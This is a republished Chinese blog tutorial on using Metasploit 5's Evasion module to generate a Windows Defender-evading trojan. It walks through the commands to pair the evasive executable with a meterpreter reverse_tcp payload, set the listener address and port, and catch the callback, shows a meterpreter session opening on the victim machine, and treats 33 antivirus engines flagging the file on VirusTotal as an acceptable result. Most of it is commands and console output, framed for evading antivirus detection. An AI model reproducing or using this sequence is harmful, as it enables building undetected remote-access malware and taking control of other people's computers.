使用metasploit中Evasion模块

川长思鸟来 2022-01-19 23:55 245阅读 0赞

[为什么80%的码农都做不了架构师？>>> ][80_]  ![hot3.png][]

![1240][]

### 简介 ###

几天前我说了kali这次更新我最关心的是metasploit升级到了5.0，5.0中有一个新的模块叫Evasion模块，这个模块可以轻松的创建反杀毒软件的木马，今天我们就来试一试

### 操作 ###

首先打开metasploit

`msfconsole`

你会看到下面这个界面

➜  ~ msfconsole
    This copy of metasploit-framework is more than two weeks old.
     Consider running 'msfupdate' to update to the latest version.
    
    
    
          .:okOOOkdc'           'cdkOOOko:.
        .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
       :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
      'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
      oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
      dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
      lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
      .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
       cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
        oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
         lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
          ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
           .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
             ,kOl'M.OOOOOOOOOOOOO.M'dOk,
               :kk;.OOOOOOOOOOOOO.;Ok:
                 ;kOOOOOOOOOOOOOOOk:
                   ,xOOOOOOOOOOOx,
                     .lOOOOOOOl.
                        ,dOd,
                          .
    
           =[ metasploit v5.0.2-dev-c808cbe0509d4e8819879c6e1ed8bda45c34a19f]
    + -- --=[ 1851 exploits - 1046 auxiliary - 321 post       ]
    + -- --=[ 541 payloads - 44 encoders - 10 nops            ]
    + -- --=[ 2 evasion                                       ]
    + -- --=[ ** This is Metasploit 5 development branch **   ]

之后使用evasion模块，首先看看有什么evasion模块

msf5 > show evasion
    
    evasion
    =======
    
       Name                             Disclosure Date  Rank    Check  Description
       ----                             ---------------  ----    -----  -----------
       windows/windows_defender_exe                      normal  No     Microsoft Windows Defender Evasive Executable
       windows/windows_defender_js_hta                   normal  No     Microsoft Windows Defender Evasive JS.Net and HTA

使用windows/windows\_defender\_exe这个模块

`use windows/windows_defender_exe`

查看要配置的参数

`show options`

msf5 evasion(windows/windows_defender_exe) > show options
    
    Module options (evasion/windows/windows_defender_exe):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       FILENAME  oDlIipoP.exe     yes       Filename for the evasive file (default: random)
    
    
    Evasion target:
    
       Id  Name
       --  ----
       0   Microsoft Windows

就一个文件名参数可以配置

`set FILENAME bboysoul.exe`

之后使用reverse\_tcp payload

`set payload windows/meterpreter/reverse_tcp`

设置端口和ip

`set LHOST 10.10.10.186`

`set LPORT 4444`

生成木马文件

`exploit`

之后打开一个监听端口

`use multi/handler`

设置payload

`set payload windows/meterpreter/reverse_tcp`

设置主机和端口

`set LHOST 10.10.10.186`

`set LPORT 4444`

执行

`exploit`

接着我们把生成出来的木马在远端要被控制的windows机器上运行我们这里就可以接收到这个回话了

msf5 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 10.10.10.186:4444
    
    ^@[*] Sending stage (179779 bytes) to 10.10.10.167
    [*] Meterpreter session 1 opened (10.10.10.186:4444 -> 10.10.10.167:52882) at 2019-02-23 13:37:14 +0800

上面都是常规操作，之后我们扫描病毒

打开

`www.virustotal.com`

放入文件扫描

![1240 1][]

只有33个病毒引擎扫描出来了，说明还可以

欢迎关注Bboysoul的博客[www.bboysoul.com][]

Have Fun

转载于:https://my.oschina.net/u/3778921/blog/3022221

[80_]: https://my.oschina.net/u/2663968/blog/3051541
[hot3.png]: /images/20220120/0afc3709675149da971996dbe5beba9c.png
[1240]: /images/20220120/29c7dc8672ec4e0faee63de64c5bb4dd.png
[1240 1]: /images/20220120/50b3ba8633f64c51a6146ad8ee5a61eb.png
[www.bboysoul.com]: http://www.bboysoul.com/